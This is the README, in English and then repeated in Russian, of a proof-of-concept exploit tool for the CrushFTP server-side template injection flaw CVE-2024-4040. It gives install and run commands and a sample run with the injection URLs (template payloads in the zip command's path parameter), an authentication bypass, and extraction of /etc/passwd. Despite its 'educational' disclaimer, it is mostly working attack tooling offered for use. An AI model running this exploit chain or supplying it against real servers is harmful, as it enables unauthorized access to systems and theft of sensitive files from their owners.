GenCrushSSTIExploit is a PoC exploit tool targeting the SSTI
(Server-Side Template Injection) vulnerability in CrushFTP CVE-2024-4040
. This tool demonstrates how to exploit this vulnerability for educational and ethical hacking purposes only.
- Establishes a session with the CrushFTP server to extract authentication cookies.
- Exploits the SSTI vulnerability to inject payloads.
- Attempts to bypass authentication and extract sensitive files from the server.
- Uses
rich
for beautiful and styled console output.
- Python 3.7+
pip
(Python package installer)
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
pip install -r requirements.txt
python GenCrushSSTIExploit.py -t <TARGET_URL>
-t / --target
: Specifies the target URL of the vulnerable CrushFTP server.
-l / --lfi
: Local File Inclusion. Specifies the file to be included for extraction.-w / --wordlist
: Specifies a wordlist for brute-forcing file paths.
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------
[*] Подключение к ServerSessionAJAX...
[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987
[*] Попытка эксплуатации уязвимости SSTI...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a
[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com
[*] Попытка обхода аутентификации...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a
[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
GenCrushSSTIExploit — это PoC инструмент эксплуатации уязвимости SSTI
(Server-Side Template Injection) в CrushFTP CVE-2024-4040
. Этот инструмент демонстрирует, как использовать данную уязвимость в образовательных и этических целях.
- Устанавливает сессию с сервером CrushFTP для извлечения куки аутентификации.
- Эксплуатирует уязвимость SSTI для внедрения полезных нагрузок.
- Пытается обойти аутентификацию и извлечь конфиденциальные файлы с сервера.
- Использует
rich
для красивого и стилизованного вывода на консоль.
- Python 3.7+
pip
(менеджер пакетов Python)
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit
pip install -r requirements.txt
python GenCrushSSTIExploit.py -t <ЦЕЛЕВОЙ_URL>
-t / --target
: Указывает целевой URL уязвимого сервера CrushFTP.
-l / --lfi
: Включение локального файла. Указывает файл для извлечения.-w / --wordlist
: Указывает словарь для перебора путей к файлам.
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------
[*] Подключение к ServerSessionAJAX...
[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987
[*] Попытка эксплуатации уязвимости SSTI...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a
[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com
[*] Попытка обхода аутентификации...
[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a
[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...